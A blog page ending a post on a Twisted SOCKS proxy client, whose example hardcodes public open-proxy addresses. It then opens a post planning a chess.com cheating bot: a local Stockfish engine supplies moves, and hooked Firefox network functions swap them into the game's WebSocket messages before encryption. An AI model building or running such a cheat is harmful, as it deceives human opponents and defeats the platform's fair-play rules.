<span class="k">def</span> <span class="nf">verifySocksReply</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Return True on success and False on need-more-data or error.</span>
<span class="sd"> In the case of an error, the connection is closed and the</span>
<span class="sd"> handshakeDone errback is invoked with a SOCKSError exception</span>
<span class="sd"> before False is returned.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o"><</span> <span class="mi">8</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">!=</span> <span class="mh">0x0</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Expected a null byte at the start of the reply.'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">status</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="k">if</span> <span class="n">status</span> <span class="o">!=</span> <span class="mh">0x5a</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Relay request failed. Reason=</span><span class="si">%s</span><span class="s1">.'</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">SOCKS4_ERRORS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">status</span><span class="p">,</span> <span class="s1">'Unknown error'</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">connectionMade</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'CONNECT'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'NEGOTIATE'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_host</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_port</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">dataReceived</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">buf</span> <span class="o">+=</span> <span class="n">data</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verifySocksReply</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">setupRelay</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">SOCKSv4aClientProtocol</span><span class="p">(</span><span class="n">SOCKSv4ClientProtocol</span><span class="p">):</span>
<span class="sd">'''Only extends SOCKS 4 to remotely resolve hostnames.'''</span>
<span class="k">def</span> <span class="nf">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version_specific'</span><span class="p">][</span><span class="s1">'username'</span><span class="p">]</span>
<span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">username</span> <span class="o">=</span> <span class="mh">0x4</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">,</span> <span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
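<span class="c1"># An address of the form 0.0.0.x (x != 0) tells a SOCKS4a proxy to resolve the appended hostname itself.</span>
<span class="n">addr</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00\x00\x00\x01</span><span class="s1">'</span>
<span class="n">dnsname</span> <span class="o">=</span> <span class="n">host</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span>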
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span> <span class="o">+</span> <span class="n">dnsname</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'REQUEST'</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">SOCKSClientFactory</span><span class="p">(</span><span class="n">ClientFactory</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span> <span class="o">=</span> <span class="n">proxy_config</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'4'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv4ClientProtocol</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'4a'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv4aClientProtocol</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'5'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol</span> <span class="o">=</span> <span class="n">SOCKSv5ClientProtocol</span>
<span class="k">def</span> <span class="nf">buildProtocol</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">ClientFactory</span><span class="o">.</span><span class="n">buildProtocol</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">)</span>
<span class="n">r</span><span class="o">.</span><span class="n">proxy_config</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span>
<span class="n">r</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span>
<span class="n">r</span><span class="o">.</span><span class="n">postHandshakeFactory</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeFactory</span>
<span class="n">r</span><span class="o">.</span><span class="n">handshakeDone</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">handshakeDone</span>
<span class="n">r</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span>
<span class="n">r</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span>
<span class="k">return</span> <span class="n">r</span>
<span class="k">class</span> <span class="nc">SOCKSWrapper</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Generic class to wrap all 3 SOCKS protocol versions 4, 4a, 5 around a TCP connection</span>
<span class="sd"> '''</span>
<span class="n">implements</span><span class="p">(</span><span class="n">IStreamClientEndpoint</span><span class="p">)</span>
<span class="n">factory</span> <span class="o">=</span> <span class="n">SOCKSClientFactory</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">reactor</span><span class="p">,</span> <span class="n">endpoint</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">timestamps</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_host</span> <span class="o">=</span> <span class="n">proxy_config</span><span class="p">[</span><span class="s1">'host'</span><span class="p">]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_port</span> <span class="o">=</span> <span class="n">proxy_config</span><span class="p">[</span><span class="s1">'port'</span><span class="p">]</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_proxy_config</span> <span class="o">=</span> <span class="n">proxy_config</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_reactor</span> <span class="o">=</span> <span class="n">reactor</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_endpoint</span> <span class="o">=</span> <span class="n">endpoint</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="kc">None</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">timestamps</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="n">timestamps</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="n">IReactorTime</span><span class="p">(</span><span class="n">reactor</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">noteTime</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">event</span><span class="p">):</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span><span class="p">[</span><span class="n">event</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="o">.</span><span class="n">seconds</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">protocolFactory</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Return a deferred firing when the SOCKS connection is established.</span>
<span class="sd"> """</span>
<span class="k">def</span> <span class="nf">createWrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Wrap creation of _WrappingFactory since __init__() doesn't</span>
<span class="sd"> take a canceller from roughly Twisted 12.1 onwards.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">inspect</span><span class="o">.</span><span class="n">getargspec</span><span class="p">(</span><span class="n">_WrappingFactory</span><span class="o">.</span><span class="fm">__init__</span><span class="p">)[</span><span class="mi">0</span><span class="p">])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">_canceller</span><span class="p">(</span><span class="n">deferred</span><span class="p">):</span>
<span class="n">connector</span><span class="o">.</span><span class="n">stopConnecting</span><span class="p">()</span>
<span class="n">deferred</span><span class="o">.</span><span class="n">errback</span><span class="p">(</span>
<span class="n">error</span><span class="o">.</span><span class="n">ConnectingCancelledError</span><span class="p">(</span>
<span class="n">connector</span><span class="o">.</span><span class="n">getDestination</span><span class="p">()))</span>
<span class="k">return</span> <span class="n">_WrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">,</span> <span class="n">_canceller</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span> <span class="c1"># Twisted >= 12.1.</span>
<span class="k">return</span> <span class="n">_WrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'START'</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># Connect with an intermediate SOCKS factory/protocol,</span>
<span class="c1"># which then hands control to the provided protocolFactory</span>
<span class="c1"># once a SOCKS connection has been established.</span>
<span class="n">f</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">factory</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_proxy_config</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_endpoint</span>
<span class="n">f</span><span class="o">.</span><span class="n">postHandshakeFactory</span> <span class="o">=</span> <span class="n">protocolFactory</span>
<span class="n">f</span><span class="o">.</span><span class="n">handshakeDone</span> <span class="o">=</span> <span class="n">defer</span><span class="o">.</span><span class="n">Deferred</span><span class="p">()</span>
<span class="n">f</span><span class="o">.</span><span class="n">_timestamps</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span>
<span class="n">f</span><span class="o">.</span><span class="n">_timer</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span>
<span class="n">wf</span> <span class="o">=</span> <span class="n">createWrappingFactory</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_reactor</span><span class="o">.</span><span class="n">connectTCP</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">_host</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">_port</span><span class="p">,</span> <span class="n">wf</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'SOCKET'</span><span class="p">)</span>
<span class="k">return</span> <span class="n">f</span><span class="o">.</span><span class="n">handshakeDone</span>
<span class="k">except</span> <span class="ne">Exception</span><span class="p">:</span>
<span class="k">return</span> <span class="n">defer</span><span class="o">.</span><span class="n">fail</span><span class="p">()</span>
</code></pre></div>
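<p>To make the wire format behind <code>sendRelayRequest</code> and <code>verifySocksReply</code> easier to see, here is a minimal standalone sketch in Python 3 (the module above targets Python 2). The helper names <code>build_socks4_request</code> and <code>parse_socks4_reply</code> are made up for illustration and are not part of the module. The sketch only packs and unpacks bytes and does not open a connection.</p>

```python
import socket
import struct

SOCKS4_VERSION = 0x04
CMD_CONNECT = 0x01
REQUEST_GRANTED = 0x5A


def build_socks4_request(host, port, username=''):
    """Build a SOCKS4 or SOCKS4a CONNECT request (hypothetical helper)."""
    # The user id field is always null-terminated, even when it is empty.
    user_id = username.encode() + b'\x00'
    # Version, command and destination port in network byte order.
    header = struct.pack('!BBH', SOCKS4_VERSION, CMD_CONNECT, port)
    try:
        # Plain SOCKS4: the destination is a literal IPv4 address.
        addr = socket.inet_aton(host)
    except OSError:
        # SOCKS4a: send the placeholder address 0.0.0.1 and append the
        # null-terminated hostname so the proxy resolves it remotely.
        addr = b'\x00\x00\x00\x01'
        return header + addr + user_id + host.encode() + b'\x00'
    return header + addr + user_id


def parse_socks4_reply(data):
    """Return the status byte of a SOCKS4 reply, or None if incomplete."""
    if len(data) < 8:
        return None  # need more data
    null_byte, status = struct.unpack('!BB', data[:2])
    if null_byte != 0x00:
        raise ValueError('first reply byte must be 0x00')
    return status
```

<p>A literal IPv4 address yields a plain SOCKS4 request, while a hostname falls back to the SOCKS4a form. A reply is successful when the returned status equals <code>0x5A</code>.</p>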
<p>You can use the module for HTTP connection endpoints roughly like this:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># Copyright (c) 2011-2013, The Tor Project</span>
<span class="c1"># See LICENSE for the license.</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">urlparse</span> <span class="kn">import</span> <span class="n">urlparse</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">reactor</span><span class="p">,</span> <span class="n">endpoints</span>
<span class="kn">from</span> <span class="nn">socksclient</span> <span class="kn">import</span> <span class="n">SOCKSv4ClientProtocol</span><span class="p">,</span> <span class="n">SOCKSWrapper</span>
<span class="kn">from</span> <span class="nn">twisted.web</span> <span class="kn">import</span> <span class="n">client</span>
<span class="k">class</span> <span class="nc">TestClass</span><span class="p">:</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">=</span> <span class="mi">0</span>
<span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">wrappercb</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy</span><span class="p">):</span>
<span class="nb">print</span> <span class="s2">"connected to proxy"</span><span class="p">,</span> <span class="n">proxy</span>
<span class="k">def</span> <span class="nf">clientcb</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span>
<span class="nb">print</span> <span class="s2">"ok, got: </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="n">content</span><span class="p">[:</span><span class="mi">120</span><span class="p">]</span>
<span class="nb">print</span> <span class="s2">"timestamps "</span> <span class="o">+</span> <span class="nb">repr</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">-=</span> <span class="mi">1</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">npages</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">reactor</span><span class="o">.</span><span class="n">stop</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">sockswrapper</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">url</span><span class="p">):</span>
<span class="n">dest</span> <span class="o">=</span> <span class="n">urlparse</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
<span class="k">assert</span> <span class="n">dest</span><span class="o">.</span><span class="n">port</span> <span class="ow">is</span> <span class="ow">not</span> <span class="kc">None</span><span class="p">,</span> <span class="s1">'Must specify port number.'</span>
<span class="n">endpoint</span> <span class="o">=</span> <span class="n">endpoints</span><span class="o">.</span><span class="n">TCP4ClientEndpoint</span><span class="p">(</span><span class="n">reactor</span><span class="p">,</span> <span class="n">dest</span><span class="o">.</span><span class="n">hostname</span><span class="p">,</span> <span class="n">dest</span><span class="o">.</span><span class="n">port</span><span class="p">)</span>
<span class="k">return</span> <span class="n">SOCKSWrapper</span><span class="p">(</span><span class="n">reactor</span><span class="p">,</span> <span class="n">endpoint</span><span class="p">,</span> <span class="n">proxy_config</span><span class="p">,</span> <span class="n">timestamps</span><span class="o">=</span><span class="bp">self</span><span class="o">.</span><span class="n">timestamps</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">thing</span> <span class="o">=</span> <span class="n">TestClass</span><span class="p">()</span>
<span class="c1"># Mandatory first argument is a URL to fetch through the SOCKS proxy</span>
<span class="c1"># selected below (for Tor, that would be localhost:9050).</span>
<span class="n">url</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="n">proxy_config</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'127.0.0.1'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">1080</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'4'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">'socksuser'</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">proxy_config2</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'212.224.92.182'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">7777</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'5'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">'someuser'</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">'somepass'</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1"># From http://fastproxyservers.org/socks5-servers.htm</span>
<span class="n">proxy_config3</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'host'</span><span class="p">:</span> <span class="s1">'202.84.44.129'</span><span class="p">,</span>
<span class="s1">'port'</span><span class="p">:</span> <span class="mi">1080</span><span class="p">,</span>
<span class="s1">'version'</span><span class="p">:</span> <span class="s1">'4'</span><span class="p">,</span>
<span class="s1">'version_specific'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'rdns'</span><span class="p">:</span> <span class="kc">True</span><span class="p">,</span> <span class="c1"># Enforce resolving hostnames remotely (Only supported by version 4a and 5)</span>
<span class="s1">'cmd'</span><span class="p">:</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x01</span><span class="s1">'</span><span class="p">,</span> <span class="c1"># this may be CONNECT, BIND and UDP in version 5. In 4 and 4a, it's always CONNECT or BIND</span>
<span class="s1">'username'</span><span class="p">:</span> <span class="s1">''</span><span class="p">,</span> <span class="c1"># Enables simple username/password authentication mechanism in version 5</span>
<span class="s1">'password'</span><span class="p">:</span> <span class="s1">''</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">f</span> <span class="o">=</span> <span class="n">client</span><span class="o">.</span><span class="n">HTTPClientFactory</span><span class="p">(</span><span class="n">url</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">deferred</span><span class="o">.</span><span class="n">addCallback</span><span class="p">(</span><span class="n">thing</span><span class="o">.</span><span class="n">clientcb</span><span class="p">)</span>
<span class="n">sw</span> <span class="o">=</span> <span class="n">thing</span><span class="o">.</span><span class="n">sockswrapper</span><span class="p">(</span><span class="n">proxy_config2</span><span class="p">,</span> <span class="n">url</span><span class="p">)</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">sw</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">d</span><span class="o">.</span><span class="n">addCallback</span><span class="p">(</span><span class="n">thing</span><span class="o">.</span><span class="n">wrappercb</span><span class="p">)</span>
<span class="n">thing</span><span class="o">.</span><span class="n">npages</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="n">reactor</span><span class="o">.</span><span class="n">run</span><span class="p">()</span>
<span class="k">if</span> <span class="s1">'__main__'</span> <span class="o">==</span> <span class="vm">__name__</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>The art of cheating: Making a chess.com chess bot following an unusual approach!2014-01-26T02:11:00+01:002014-01-26T02:11:00+01:00Nikolai Tschachertag:incolumitas.com,2014-01-26:/2014/01/26/the-art-of-cheating-making-a-chess-com-chess-bot-using-a-unusual-approach/<h3>Table of contents</h3>
<ol>
<li><strong><a href="#chap_preface">Preface</a></strong>: Giving first insight into the idea and
why I think that hooking into a browser is a good idea.</li>
<li><strong><a href="#chap_dwmbgb">Many different ways to make browser game bots</a></strong>:
Discussing various techniques to write HTTP/WebSocket bots</li>
<li><strong><a href="#chap_internals">What do chess.com's internals look like?</a></strong>:
Investigation of the client side behavior of
<a href="http://chess.com">chess.com</a></li>
<li><strong><a href="#chap_workings">How the bot works</a></strong>: Explaining how my shared
library hooks Firefox network functions</li>
<li><strong><a href="#chap_concl">Conclusion</a></strong>: Summary of my discoveries</li>
<li><strong><a href="https://vimeo.com/85060026" title="Link to the demonstration of the bot">Demo
Video</a>
and another, <a href="https://vimeo.com/85083958" title="demo video, better">better demo
video</a></strong>: You may want to
watch only the videos, but make sure you <a href="#chap_demo">read the explanation at
the very bottom of this blog post!</a></li>
<li>You can find the source of the shared library (.so) on my <a href="https://github.com/NikolaiT/chess-com-cheat/" title="Link to chess.com cheat library">GitHub
account</a>.</li>
</ol>
<h3 id="chap_preface">Preface</h3>
<p>Usually I don't have good ideas in the form of flashes of genius. On the
contrary, I think that many endeavors and interesting projects might be
reasonable if realized, but often there's a huge amount of work
involved and <em>too</em> many variables and strategic decisions in the process
that could eventually render the project a failure. What I am trying to say: A
mediocre idea well engineered might be a good product. But a good idea
badly implemented and designed is usually just bad in its final form.</p>
<p>Raw, abstract ideas exist in abundance. So does the will to make them
happen. But once in a while, I manage to overcome these two hindrances
and begin to build and shape my ideas into reality.</p>
<p>So around 10 days ago (yes, it took me that long to make it) I went
jogging in the forest and my subconscious searched for different
possibilities to cheat in a chess browser game
(<a href="http://chess.com" title="chess server">chess.com</a> to be specific). I knew
that there were quite a few different approaches. So before I get all too
technical, let's define the problem:</p>
<p>I want to build a bot that plays automatic actions/moves on an online chess
server, whose communication is realized over HTTP/1.1 and
<a href="http://tools.ietf.org/html/rfc6455">WebSocket</a> (https and wss
respectively), all TLS/SSL encrypted.</p>
<p>Additionally the following constraints need to be considered:</p>
<ul>
<li>The bot should work <em>while the player is actually playing</em>. That
means: Without any real action by a human, the bot won't do anything
at all.</li>
<li>The engine that computes the moves is a local process. I chose
<a href="http://stockfishchess.org/">Stockfish</a>: it has a pretty decent
strength and is open source which makes it usable on Linux contrary
to Houdini. If we want to use engine calculated information in the
browser we need to get a channel to a local process. We can't
integrate Stockfish originated data into the browser process space
with memory injection methods, since it seems hard and I don't know
how to do it (correctly). But we surely may interact with the local
process in any other possible IPC way.</li>
</ul>
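<p>To make the "channel to a local process" a bit more concrete, here is a minimal sketch of talking to a UCI engine over plain pipes. It is not the code of my bot: the function names, the default think time and the assumption that a binary called <em>stockfish</em> is on the PATH are all made up for illustration. Only the UCI commands themselves (<em>position</em>, <em>go movetime</em>, <em>bestmove</em>) come from the UCI protocol.</p>

```python
import subprocess


def position_command(moves):
    """Build the UCI 'position' command for a game given as coordinate moves."""
    if not moves:
        return "position startpos"
    return "position startpos moves " + " ".join(moves)


def parse_bestmove(line):
    """Return the move from a UCI 'bestmove' line, or None for any other line."""
    parts = line.split()
    if len(parts) >= 2 and parts[0] == "bestmove":
        return parts[1]
    return None


def ask_engine(moves, movetime_ms=500, engine_path="stockfish"):
    """Ask a local UCI engine for its move (engine_path is an assumption)."""
    with subprocess.Popen(
        [engine_path],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        text=True,
        bufsize=1,
    ) as engine:
        engine.stdin.write("uci\n")
        engine.stdin.write(position_command(moves) + "\n")
        engine.stdin.write(f"go movetime {movetime_ms}\n")
        engine.stdin.flush()
        best = None
        # Skip the engine's id/info output until the bestmove line shows up.
        for line in engine.stdout:
            best = parse_bestmove(line)
            if best is not None:
                break
        engine.stdin.write("quit\n")
        engine.stdin.flush()
    return best
```

<p>With an engine installed, <em>ask_engine(["e2e4", "e7e5"])</em> would return the engine's reply as a coordinate move string, which is the same notation used in the examples of this post.</p>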
<p>So this was the idea that came to me in the woods while running: Why
should I even bother rebuilding the whole chess.com communication
protocol, when I can just <em>replace the moves I made in-game with
engine-calculated equivalents?!</em></p>
<p>Every move (like <em>a2a3</em> or <em>g7g8</em>) has the same length, so I need to
find the point where the packets (or messages in WebSocket RFC
terminology) are still in plaintext (note that all traffic is TLS/SSL
layered) such that it's possible to update them in place, without dealing with
the hassle of TLS/SSL.</p>
